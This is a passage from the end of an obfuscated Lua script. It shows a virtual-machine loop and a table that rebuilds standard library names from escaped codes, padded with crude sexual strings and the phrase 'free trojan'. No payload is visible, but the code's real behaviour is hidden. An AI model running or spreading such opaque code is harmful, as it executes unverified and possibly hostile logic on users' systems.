e=d,e[L]do a=a+l;_[e]=k[a];end n=n+l;e=o[n];n=e[w];break end;break;end while(d)/((-#[[me big peepee]]+(0x7d2+-119)))==2039 do d=(1236220)while(-0x4e+182)<a do d=-d local d=e[h];local n=_[d]for e=d+1,e[T]do n=n.._[e];end;_[e[b]]=n;break end while(d)/((-#[[test]]+(4617-0x931)))==547 do if(_[e[c]]~=e[B])then n=n+i;else n=e[h];end;break end;break;end break;end break;end break;end break;end break;end n=n+l;end;end);end;return E(P(),{},Y())()end)_msec({[(392-0xed)]='\115\116'..(function(e)return(e and'((21018/0xba)+-#[[amena jumping]])')or'\114\105'or'\120\58'end)((0x32a/162)==(678/0x71))..'\110g',[(-#'test123'+(0x125c0/100))]='\108\100'..(function(e)return(e and'(-#\'Little kids\'+(0x6810/240))')or'\101\120'or'\119\111'end)(((54+-0x24)+-#[[big hard cock]])==(((-#"amena jumping"+(3858+-0x66))/0xc5)+-#[[me big peepee]]))..'\112',[(-#[[free trojan]]+(626-0x171))]=(function(e)return(e and'((-125+0xe8)+-#[[test123]])')and'\98\121'or'\100\120'end)((110-(0x15bd/53))==(-#"This is working now"+(0x61+-73)))..'\116\101',[((0x2d4-395)+-#'This is working now')]='\99'..(function(e)return(e and'((0xb0+-68)+-#\'test 123\')')and'\90\19\157'or'\104\97'end)(((138-0x78)+-#[[amena jumping]])==(73-0x46))..'\114',[(0x49d-601)]='\116\97'..(function(e)return(e and'(-86+0xba)')and'\64\113'or'\98\108'end)((0x76-(0x6900/240))==(0x307/155))..'\101',[(83694/0xae)]=(function(e)return(e and'(17800/0xb2)')or'\115\117'or'\78\107'end)((99+-0x60)==((197-0x9f)+-#[[test123]]))..'\98',[(815+-#{{};16,1,(function()return{','}end)()})]='\99\111'..(function(e)return(e and'((((0x51024/117)+-#"free trojan")/25)+-#[[big hard cock]])')and'\110\99'or'\110\105\103\97'end)((0x7c+-93)==(-85+(-0x20+148)))..'\97\116',[(-#"test123"+(-107+0x2f1))]=(function(e,n)return(e and'(0x2580/96)')and'\48\159\158\188\10'or'\109\97'end)((0x63+-94)==((-127+0x89)+-#"test"))..'\116\104',[(0xa90-1365)]=(function(n,e)return((122-0x75)==(-#"test"+(231/0x21))and'\48'..'\195'or n..((not'\20\95\69'and'\90'..'\180'or e)))or'\199\203\95'end),[(973+-#{1,'}';1;1,(function()return{','}end)()})]='\105\110'..(function(e,n)return(e and'(-0x74+216)')and'\90\115\138\115\15'or'\115\101'end)((0x479/229)==(-98+0x81))..'\114\116',[((-#"test123"+(13437340/0xa4))/0x4d)]='\117\110'..(function(e,n)return(e and'(1700/0x11)')or'\112\97'or'\20\38\154'end)((101+-0x60)==(133-0x66))..'\99\107',[(-#"amena jumping"+(0x4cd+((-3193/0x67)+-#"no thanks")))]='\115\101'..(function(e)return(e and'(254-0x9a)')and'\110\112\99\104'or'\108\101'end)((-#'test123'+((1583+-0x53)/0x7d))==(0x86-103))..'\99\116',[(-#'I like gargling cum'+(232227/0xb7))]='\116\111\110'..(function(e,n)return(e and'(0x46b4/181)')and'\117\109\98'or'\100\97\120\122'end)((-#'test 123'+(0x76-105))==(-0x76+123))..'\101\114'},{[(190-0x7a)]=((getfenv)or(function()return(_ENV)end))},((getfenv)or(function()return(_ENV)end))()) end)()


